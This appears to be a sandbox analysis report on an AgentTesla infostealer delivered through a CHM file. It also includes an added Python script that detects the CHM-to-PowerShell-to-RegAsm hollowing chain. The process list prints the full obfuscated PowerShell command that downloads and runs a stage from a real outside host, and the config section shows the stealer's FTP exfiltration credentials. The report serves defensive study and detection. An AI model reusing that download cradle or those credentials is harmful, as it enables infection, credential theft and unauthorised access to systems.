Analysis
- max time kernel: 175s
- max time network: 181s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 08-12-2022 11:15
Static task: static1
Behavioral task: behavioral1 (sample mel9.chm, resource win7-20220812-en)
Behavioral task: behavioral2 (sample mel9.chm, resource win10v2004-20221111-en)
General
- Target: mel9.chm
- Size: 13KB
- MD5: e7a3bc55f52eebb6ce7df0a0047fec40
- SHA1: b152e0d6abc8dab4500aaa4161dac968e54cad20
- SHA256: 908d78eb614a8ecf652163a4ccbdf62deec33d03747d4342d4f90e5bcf7995d8
- SHA512: 3537fee98df7a02510e65c4a7fbe302e154d37e5ea497fe2677936f3442afc565a4a6307a870971ca3f45a8d25bee50b71a04c515664737cbe72d4031a186a81
- SSDEEP: 192:8FYhJztroZ7rRXcAU9aoSpW9KZYtsufMCKv6:gYjtroZ7rAv9yYtsuFKv
Malware Config
Extracted (URL fetched by the PowerShell stage)
- https://cricot2.kylos.pl/mel9.txt
Extracted (agenttesla)
- Protocol: ftp
- Host: ftp://ftp.peva.it
- Port: 21
- Username: anita@peva.it
- Password: Team2318!@#
Signatures
-
AgentTesla
Agent Tesla is a .NET information stealer and remote access tool (RAT), originally written in VB.NET. The extracted config above shows this build exfiltrating over plain FTP to ftp.peva.it with the listed credentials.
-
Blocklisted process makes network request 1 IoCs
Processes (flow, pid, process):
75, 2460, powershell.exe
-
Loads dropped DLL 2 IoCs
Processes (pid, process):
2460, powershell.exe
2460, powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of SetThreadContext 1 IoCs
Processes (pid, process, target pid, target process):
2460 powershell.exe set thread context of 3036 RegAsm.exe
Together with the eight WriteProcessMemory events from 2460 into 3036 listed below and a RegAsm.exe launched with no arguments, this is the process-hollowing pattern: the in-memory payload is written into the suspended RegAsm.exe and the thread context is redirected to it.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes (pid, process):
2460 powershell.exe
2460 powershell.exe
3036 RegAsm.exe
3036 RegAsm.exe
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes (token, pid, process):
2460 powershell.exe: SeDebugPrivilege, then twice the sequence SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
3036 RegAsm.exe: SeDebugPrivilege
(Numeric entries are privilege LUIDs the sandbox left unnamed.)
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes (pid, process):
1212 hh.exe
1212 hh.exe
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes (pid, process, target pid, target process):
1212 hh.exe wrote to memory of 2460 powershell.exe (2 events)
2460 powershell.exe wrote to memory of 3036 RegAsm.exe (8 events)
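Detection logic for the chain these signatures describe (hh.exe spawning a hidden, obfuscated PowerShell, which in turn starts an argument-less RegAsm.exe that it then writes into), run over constructed Sysmon-style process-creation events. This is an added example, not code from the report or the sandbox: the field names follow Sysmon Event ID 1, PIDs 1212/2460/3036 mirror the tree in this report, and PIDs 900/4000/4001 are invented benign context.

```python
"""Detection logic for the process chain in this report, run over constructed
Sysmon-style (Event ID 1) process-creation events. Added example, not code
from the report or the sandbox; the field names and the benign events are
assumptions made to mirror the tree above."""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
# .NET framework utilities that loaders commonly start suspended and hollow out.
HOLLOW_TARGETS = {"regasm.exe", "regsvcs.exe", "msbuild.exe",
                  "installutil.exe", "aspnet_compiler.exe"}
# Hidden window, Set-Alias (sal) of a cmdlet, .replace() string building,
# or quoted-fragment concatenation: the tricks used by PID 2460 above.
OBFUSCATION = re.compile(
    r"-w(?:indowstyle)?\s+hidden|\bsal\s+\w+|\.replace\('|'\s*\+\s*'", re.I)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

# Constructed events: PIDs 1212/2460/3036 follow the report; 900, 4000 and
# 4001 are invented benign context (explorer, an admin shell, a real RegAsm run).
EVENTS = [
    {"ProcessId": 900, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 1212, "ParentProcessId": 900, "Image": r"C:\Windows\hh.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\mel9.chm'},
    {"ProcessId": 2460, "ParentProcessId": 1212, "Image": PS, "ParentImage": r"C:\Windows\hh.exe",
     # only the start of the recorded command line; the rest is not needed here
     "CommandLine": '"' + PS + '" -WindowStyle hidden '
                    + "$t0='DE5'.replace('D','I').replace('5','x');sal P $t0;"},
    {"ProcessId": 3036, "ParentProcessId": 2460, "Image": REGASM, "ParentImage": PS,
     "CommandLine": '"' + REGASM + '"'},
    {"ProcessId": 4000, "ParentProcessId": 900, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Logs"},
    {"ProcessId": 4001, "ParentProcessId": 4000, "Image": REGASM, "ParentImage": PS,
     "CommandLine": '"' + REGASM + r'" /codebase C:\App\Interop.dll'},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def args_after_image(cmdline):
    """Everything after the (possibly quoted) image path; '' for a bare launch."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline)
    return m.group(1).strip() if m else ""


def lineage(events, pid):
    """Ancestor chain of pid, root first, following ParentProcessId links."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain[::-1]


def detect(events):
    alerts = []
    for e in events:
        img, parent, pid = basename(e["Image"]), basename(e["ParentImage"]), e["ProcessId"]
        if parent == "hh.exe" and img in SCRIPT_HOSTS:
            alerts.append(("T1218.001 CHM viewer launched a script host", pid))
        if img in {"powershell.exe", "pwsh.exe"} and OBFUSCATION.search(e["CommandLine"]):
            alerts.append(("T1059.001 hidden/obfuscated PowerShell", pid))
        # A .NET utility started by a script host with no arguments does nothing
        # useful on its own: the classic suspended-then-hollowed target.
        if img in HOLLOW_TARGETS and parent in SCRIPT_HOSTS and not args_after_image(e["CommandLine"]):
            alerts.append(("T1055.012 bare .NET utility spawned by script host", pid))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}, chain {' -> '.join(lineage(EVENTS, pid))}")
```

The argument check is what keeps the RegAsm rule quiet on a genuine `RegAsm.exe /codebase ...` registration run from an admin shell (PID 4001 above); the hollowing target in this report is started with nothing but its own path.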
Processes
-
C:\Windows\hh.exe (depth 1)
Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\mel9.chm
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, child of hh.exe)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://cricot2.kylos.pl/mel9.txt')|P
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (depth 3, child of powershell.exe)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\6fa7e56d-5a67-4728-a5db-c67fd5cf7763\AgileDotNetRT64.dll
Filesize: 75KB
MD5: 42b2c266e49a3acd346b91e3b0e638c0
SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
C:\Users\Admin\AppData\Local\Temp\f1c816ee-9c5b-4ee5-8939-4ab00a42e9d3\AgileDotNetRT64.dll
Filesize: 75KB
MD5: 42b2c266e49a3acd346b91e3b0e638c0
SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
The same DLL is dropped twice under different GUID-named Temp directories. AgileDotNetRT64.dll is the native runtime shipped with the Agile.NET (CliSecure) .NET protector, which a protected assembly extracts to such a directory when it starts; its being loaded by powershell.exe (the "Loads dropped DLL" signature) is consistent with the downloaded .NET stage being Agile.NET-protected and running inside the PowerShell process before it hollows RegAsm.exe.
Memory dumps (pid-sequence-range):
-
memory/2460-135-0x00007FFBD2B50000-0x00007FFBD3611000-memory.dmp
Filesize: 10.8MB
-
memory/2460-134-0x000002329FA60000-0x000002329FA82000-memory.dmp
Filesize: 136KB
-
memory/2460-137-0x00007FFBD2B50000-0x00007FFBD3611000-memory.dmp
Filesize: 10.8MB
-
memory/2460-138-0x00007FFBC9A20000-0x00007FFBC9B6E000-memory.dmp
Filesize: 1.3MB
-
memory/2460-133-0x0000000000000000-mapping.dmp
-
memory/2460-143-0x00007FFBD2B50000-0x00007FFBD3611000-memory.dmp
Filesize: 10.8MB
-
memory/3036-140-0x0000000000400000-0x000000000043C000-memory.dmp
Filesize: 240KB
-
memory/3036-141-0x0000000000437A7E-mapping.dmp
-
memory/3036-142-0x0000000005460000-0x0000000005A04000-memory.dmp
Filesize: 5.6MB
-
memory/3036-144-0x00000000051E0000-0x000000000527C000-memory.dmp
Filesize: 624KB
-
memory/3036-145-0x00000000053F0000-0x0000000005456000-memory.dmp
Filesize: 408KB
The 0x400000-0x43C000 region of PID 3036 (the 32-bit Framework RegAsm.exe) is the image that powershell.exe wrote into it, and the 0x437A7E mapping dump lies inside that region; together with the SetThreadContext event this is where to start when carving the AgentTesla payload from the hollowed process.